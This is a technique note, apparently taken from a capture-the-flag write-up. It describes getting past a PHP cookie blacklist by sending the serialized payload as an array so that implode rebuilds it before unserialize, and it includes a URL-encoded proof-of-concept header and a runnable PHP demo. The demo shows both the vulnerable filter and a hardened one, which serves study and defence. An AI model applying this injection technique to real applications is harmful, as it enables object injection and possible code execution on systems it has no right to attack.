web php object-injection deserialization blacklist-bypass type-confusion cookie

Send an array-shaped cookie so a string blacklist fails open, then let the app reassemble the serialized payload with implode.

PHP Object Injection with Blacklist Bypass via Cookie Arrays

PHP registers request variables written with bracket syntax as arrays, and cookies go through the same name[index] logic as query strings: a header of the form Cookie: flans[0]=... leaves $_COOKIE['flans'] as an array rather than a string. A blacklist written for a string then hits type confusion: on PHP 7 the substring check emits a warning and returns NULL, on PHP 8 it throws a TypeError that the application may catch and ignore, and in both cases the check never matches the serialized marker. The application later normalizes the array back into a string with implode, resurrecting the original serialized payload after the blacklist step.

Why It Works

  • strpos, preg_match and similar string functions do not accept an array. On PHP 7.x they emit a warning and return NULL, so a truthy check such as if (preg_match(...)) never fires; note that the comparison style decides the outcome, since strpos(...) !== false treats NULL as a match and fails closed. On PHP 8.x they throw a TypeError, so the filter is skipped wherever the app catches and logs errors or only runs the check for values that pass is_string.
  • Either way the blacklist never sees the dangerous substring in the array, and the value is rejoined into the payload afterward.

Vulnerable Pattern

  • Filters using strpos, regex, or substring checks on cookie/request values without first enforcing that the value is a scalar string (is_string, or rejecting anything else), followed by an implode or similar normalization that rebuilds the string before unserialize.

Exploit Flow

  1. Send the dangerous serialized payload through an array-shaped cookie (flans[0]=... instead of flans=...) so the blacklist receives an array. URL-encode the value: the ';' inside serialized data is also the cookie separator, so a raw payload is cut at its first ';'.
  2. Verify how the application rejoins or reuses the array: the implode glue and the element order decide what reaches unserialize. With a single index the glue is irrelevant and the payload comes back byte for byte.

Variations

  • Query params, form fields, or repeated headers with framework-dependent array syntax (PHP applies the same name[...] parsing to $_GET and $_POST; other frameworks have their own conventions).
  • If the filter walks the array element by element and the glue is empty, the marker can be split across indices so that no single element contains it. This follows from the same rejoin step rather than from the original writeup, so confirm the glue first.

Common Blockers

  • Strict type checks (is_string or a typed string parameter) before validation, scalar casting before validation, or no rejoin path after the blacklist.
  • On PHP 8 an uncaught TypeError from the string function aborts the request, so the bypass only works where the error is caught or the check is skipped for non-strings.
  • unserialize() called with allowed_classes => false, or a cookie whose integrity is checked (for example an HMAC) before it is parsed, closes the sink regardless of the filter.

PoC Sketch

Cookie: flans[0]=O%3A4%3A%22Flan%22%3A...
# the serialized payload is URL-encoded because ';' and '"' are not safe in a raw cookie value
# blacklist receives an array; app later implodes it back into a serialized string
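The whole chain, as an added PHP example rather than the challenge's own code: it approximates how PHP turns a Cookie header into $_COOKIE, runs a blacklist that never checks its input type, rejoins the array with implode, and unserializes the result, then repeats the run with a type-enforcing filter. The class name Flan and the cookie name flans come from the PoC sketch; the blacklist regex, the property name, the empty implode glue and the log-and-continue error handling are assumptions standing in for whatever the real application did.

```php
<?php
// Added example (not the challenge's code): simulates PHP's cookie parsing,
// a string blacklist that never checks its input type, the implode() rejoin,
// and a hardened variant. Class name Flan and cookie name flans come from the
// PoC sketch; the regex, property, glue and error handling are assumed.

class Flan {
    public $name;
    public function __wakeup() {
        // In a real target a magic method like this is where a gadget chain
        // starts. Here it only records that the injected object was built.
        $this->name = 'woken:' . $this->name;
    }
}

// Approximates how PHP fills $_COOKIE: pairs are split on ';', then each
// name=value goes through the same name[index] -> array logic as $_GET.
function parse_cookie_header(string $header): array {
    $pairs = array_map('trim', explode(';', $header));
    parse_str(implode('&', $pairs), $vars);
    return $vars;
}

// Vulnerable: assumes $value is a string but never checks.
// PHP 7.x: preg_match() on an array emits a warning and returns NULL, which is
// falsy, so nothing is blocked. PHP 8.x: it throws TypeError; the "log and
// continue" handler below (assumed, but common) gives the same fail-open result.
function weak_filter($value): bool {
    try {
        return (bool) @preg_match('/[OCa]:\d+:/', $value);
    } catch (TypeError $e) {
        error_log('blacklist skipped: ' . $e->getMessage());
        return false;
    }
}

// Hardened: enforce the scalar type before any substring check.
function strict_filter($value): bool {
    if (!is_string($value)) {
        return true;   // arrays, ints, null: reject rather than guess
    }
    return (bool) preg_match('/[OCa]:\d+:/', $value);
}

// The sink: blacklist, then "normalize" arrays back to a string, then
// unserialize. With a single index the glue is irrelevant; an empty glue (assumed)
// would also reassemble a payload that was split across several indices.
function load_flan($cookie, callable $filter) {
    if ($filter($cookie)) {
        return 'blocked';
    }
    $raw = is_array($cookie) ? implode('', $cookie) : (string) $cookie;
    return @unserialize($raw);
}

function demo(): array {
    $payload = 'O:4:"Flan":1:{s:4:"name";s:1:"x";}';
    // Serialized data contains ';' and '"', so it must be URL-encoded in a
    // Cookie header or PHP splits it at the first ';'.
    $plain  = 'flans=' . rawurlencode($payload);
    $arrayd = 'flans[0]=' . rawurlencode($payload);

    $c1 = parse_cookie_header($plain)['flans'];    // string
    $c2 = parse_cookie_header($arrayd)['flans'];   // array: [0 => $payload]

    return [
        'string_weak'     => load_flan($c1, 'weak_filter'),    // 'blocked'
        'array_weak'      => load_flan($c2, 'weak_filter'),    // Flan object
        'string_strict'   => load_flan($c1, 'strict_filter'),  // 'blocked'
        'array_strict'    => load_flan($c2, 'strict_filter'),  // 'blocked'
    ];
}

foreach (demo() as $case => $result) {
    echo $case, ': ',
        is_object($result) ? get_class($result) . ' ' . $result->name : $result,
        "\n";
}
```

Run it with php on either a 7.x or 8.x interpreter: only array_weak yields an instantiated Flan, and its name property shows that __wakeup ran, which is the object injection the blacklist was meant to stop. The strict filter rejects the array outright instead of guessing what a non-string means; in a real fix, pair that with unserialize($raw, ['allowed_classes' => false]) or stop unserializing cookie data altogether.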

Good Situations To Use It

  • A blacklist filters serialized markers in a cookie string.
  • The value is later joined back (implode) before unserialize.
  • Scalar type isn't enforced before the check.

Sources

  • midnight_flag2026/web/clash_of_flans